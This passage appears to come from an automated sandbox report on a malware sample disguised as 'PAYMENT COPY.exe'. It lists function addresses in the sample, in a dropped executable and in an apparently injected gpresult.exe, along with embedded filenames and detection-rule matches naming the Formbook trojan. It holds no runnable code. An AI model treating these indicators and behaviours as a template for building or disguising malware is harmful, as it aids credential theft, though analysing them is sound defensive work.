Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015502C0	9_2_015502C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01590591	9_2_01590591
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01582446	9_2_01582446
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01574420	9_2_01574420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157E4F6	9_2_0157E4F6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F4750	9_2_014F4750
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CC7C0	9_2_014CC7C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EC6E0	9_2_014EC6E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E6962	9_2_014E6962
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0159A9A6	9_2_0159A9A6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D2840	9_2_014D2840
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DA840	9_2_014DA840
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE8F0	9_2_014FE8F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B68B8	9_2_014B68B8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158AB40	9_2_0158AB40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01586BD7	9_2_01586BD7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CEA80	9_2_014CEA80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156CD1F	9_2_0156CD1F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DAD00	9_2_014DAD00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CADE0	9_2_014CADE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E8DBF	9_2_014E8DBF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0C00	9_2_014D0C00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0CF2	9_2_014C0CF2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570CB5	9_2_01570CB5
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01544F40	9_2_01544F40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01572F30	9_2_01572F30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01512F28	9_2_01512F28
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F0F30	9_2_014F0F30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C2FC8	9_2_014C2FC8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DCFE0	9_2_014DCFE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154EFA0	9_2_0154EFA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0E59	9_2_014D0E59
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158EE26	9_2_0158EE26
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158EEDB	9_2_0158EEDB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158CE93	9_2_0158CE93
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2E90	9_2_014E2E90
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0159B16B	9_2_0159B16B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BF172	9_2_014BF172
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150516C	9_2_0150516C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DB1B0	9_2_014DB1B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D70C0	9_2_014D70C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157F0CC	9_2_0157F0CC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015870E9	9_2_015870E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158F0E0	9_2_0158F0E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BD34C	9_2_014BD34C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158132D	9_2_0158132D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0151739A	9_2_0151739A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EB2C0	9_2_014EB2C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015712ED	9_2_015712ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D52A0	9_2_014D52A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01587571	9_2_01587571
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015995C3	9_2_015995C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156D5B0	9_2_0156D5B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C1460	9_2_014C1460
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158F43F	9_2_0158F43F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158F7B0	9_2_0158F7B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01515630	9_2_01515630
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015816CC	9_2_015816CC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D9950	9_2_014D9950
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EB950	9_2_014EB950
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01565910	9_2_01565910
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153D800	9_2_0153D800
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D38E0	9_2_014D38E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FB76	9_2_0158FB76
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01545BF0	9_2_01545BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150DBF9	9_2_0150DBF9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EFB80	9_2_014EFB80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FA49	9_2_0158FA49
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01587A46	9_2_01587A46
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01543A6C	9_2_01543A6C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157DAC6	9_2_0157DAC6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01515AA0	9_2_01515AA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01571AA3	9_2_01571AA3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156DAAC	9_2_0156DAAC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01581D5A	9_2_01581D5A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D3D40	9_2_014D3D40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01587D73	9_2_01587D73
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EFDC0	9_2_014EFDC0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01549C32	9_2_01549C32
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FCF2	9_2_0158FCF2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FF09	9_2_0158FF09
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01493FD2	9_2_01493FD2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01493FD5	9_2_01493FD5
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D1F92	9_2_014D1F92
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FFB1	9_2_0158FFB1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D9EB0	9_2_014D9EB0
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_0113D4FC	10_2_0113D4FC
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_05386D98	10_2_05386D98
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_05380040	10_2_05380040
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_0707B458	10_2_0707B458
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_070733D7	10_2_070733D7
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_070733E8	10_2_070733E8
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07072F91	10_2_07072F91
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07076F9A	10_2_07076F9A
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07072FB0	10_2_07072FB0
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07074EC8	10_2_07074EC8
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07073820	10_2_07073820
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07075878	10_2_07075878
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B53BB6	12_2_03B53BB6
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5A2A6	12_2_03B5A2A6
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B53996	12_2_03B53996
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5398D	12_2_03B5398D
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B710A6	12_2_03B710A6
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B51C36	12_2_03B51C36
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0497E4F6	13_2_0497E4F6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04974420	13_2_04974420
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04982446	13_2_04982446
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04990591	13_2_04990591
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0535	13_2_048D0535
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EC6E0	13_2_048EC6E0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048CC7C0	13_2_048CC7C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048F4750	13_2_048F4750
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0770	13_2_048D0770
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04962000	13_2_04962000
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049901AA	13_2_049901AA
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049841A2	13_2_049841A2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049881CC	13_2_049881CC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C0100	13_2_048C0100
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496A118	13_2_0496A118
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04958158	13_2_04958158
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049502C0	13_2_049502C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04970274	13_2_04970274
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DE3F0	13_2_048DE3F0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049903E6	13_2_049903E6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498A352	13_2_0498A352
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04970CB5	13_2_04970CB5
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C0CF2	13_2_048C0CF2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0C00	13_2_048D0C00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048E8DBF	13_2_048E8DBF
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048CADE0	13_2_048CADE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496CD1F	13_2_0496CD1F
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DAD00	13_2_048DAD00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498CE93	13_2_0498CE93
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048E2E90	13_2_048E2E90
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498EEDB	13_2_0498EEDB
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498EE26	13_2_0498EE26
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0E59	13_2_048D0E59
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0494EFA0	13_2_0494EFA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C2FC8	13_2_048C2FC8
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DCFE0	13_2_048DCFE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04972F30	13_2_04972F30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04912F28	13_2_04912F28
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048F0F30	13_2_048F0F30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04944F40	13_2_04944F40
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048B68B8	13_2_048B68B8
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048FE8F0	13_2_048FE8F0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D2840	13_2_048D2840
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DA840	13_2_048DA840
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D29A0	13_2_048D29A0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0499A9A6	13_2_0499A9A6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048E6962	13_2_048E6962
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048CEA80	13_2_048CEA80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04986BD7	13_2_04986BD7
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498AB40	13_2_0498AB40
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498F43F	13_2_0498F43F
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C1460	13_2_048C1460
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496D5B0	13_2_0496D5B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049995C3	13_2_049995C3
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04987571	13_2_04987571
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049816CC	13_2_049816CC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04915630	13_2_04915630
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498F7B0	13_2_0498F7B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D70C0	13_2_048D70C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0497F0CC	13_2_0497F0CC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049870E9	13_2_049870E9
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498F0E0	13_2_0498F0E0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DB1B0	13_2_048DB1B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0499B16B	13_2_0499B16B
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048BF172	13_2_048BF172
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0490516C	13_2_0490516C
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D52A0	13_2_048D52A0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EB2C0	13_2_048EB2C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049712ED	13_2_049712ED
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0491739A	13_2_0491739A
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498132D	13_2_0498132D
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048BD34C	13_2_048BD34C
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FCF2	13_2_0498FCF2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04949C32	13_2_04949C32
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EFDC0	13_2_048EFDC0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04981D5A	13_2_04981D5A
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D3D40	13_2_048D3D40
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04987D73	13_2_04987D73
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D9EB0	13_2_048D9EB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D1F92	13_2_048D1F92
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FFB1	13_2_0498FFB1
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04893FD2	13_2_04893FD2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04893FD5	13_2_04893FD5
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FF09	13_2_0498FF09
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D38E0	13_2_048D38E0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0493D800	13_2_0493D800
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04965910	13_2_04965910
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D9950	13_2_048D9950
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EB950	13_2_048EB950
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04915AA0	13_2_04915AA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04971AA3	13_2_04971AA3
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496DAAC	13_2_0496DAAC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0497DAC6	13_2_0497DAC6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FA49	13_2_0498FA49
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04987A46	13_2_04987A46
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04943A6C	13_2_04943A6C
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EFB80	13_2_048EFB80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04945BF0	13_2_04945BF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0490DBF9	13_2_0490DBF9
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498FB76	13_2_0498FB76
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00871BD0	13_2_00871BD0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0088A4F0	13_2_0088A4F0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086CDD7	13_2_0086CDD7
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086CDE0	13_2_0086CDE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086B080	13_2_0086B080
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0086D000	13_2_0086D000
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_008736F0	13_2_008736F0

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 01505130 appears 58 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 0153EA12 appears 86 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 01517E54 appears 111 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 0154F290 appears 105 times
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: String function: 014BB970 appears 280 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 048BB970 appears 280 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 04917E54 appears 111 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 0494F290 appears 105 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 04905130 appears 58 times
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: String function: 0493EA12 appears 86 times

Source: PAYMENT COPY.exe, 00000000.00000002.2541512571.00000000070D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000000.2482179124.00000000007DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameiAuF.exeJ vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2537047535.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2541956443.0000000007375000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2524034674.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000000.00000002.2540867371.0000000005D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegprslt.exej% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe, 00000009.00000002.2685474878.00000000015BD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
Source: PAYMENT COPY.exe	Binary or memory string: OriginalFilenameiAuF.exeJ vs PAYMENT COPY.exe

Source: PAYMENT COPY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
